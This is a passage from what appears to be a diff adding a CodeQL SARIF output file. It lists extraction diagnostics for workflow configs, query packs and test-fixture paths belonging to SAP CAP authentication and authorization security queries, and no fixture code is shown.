{ + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/actions/install-qlt/action.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 6 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/codeql/codeql-config.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 7 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/codeql/extensions/javascript/frameworks/cap/ext/ext/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 8 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/codeql/extensions/javascript/frameworks/cap/ext/ext/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 9 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 10 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 11 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/ui5.model.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 12 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/additional-sources.model.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 13 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 14 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 15 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/workflows/code_scanning.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 16 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : ".github/workflows/run-codeql-unit-tests-javascript.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 17 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "codeql-workspace.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 18 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/lib/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 19 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/lib/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 20 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/src/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 21 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/src/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 22 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 23 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 24 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 25 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 26 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 27 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 28 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 29 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 30 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 31 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 32 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 33 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 34 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 35 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 36 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 37 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 38 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 39 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 40 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 41 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 42 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 43 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 44 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 45 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 46 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 47 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 48 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 49 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 50 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 51 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 52 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 53 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 54 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 55 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/privileged-user.js", + "uriBaseId" : "%SRCROOT%", + "index" : 56 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 57 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 58 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 59 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 60 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 61 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 62 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 63 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 64 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 65 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 66 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 67 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + 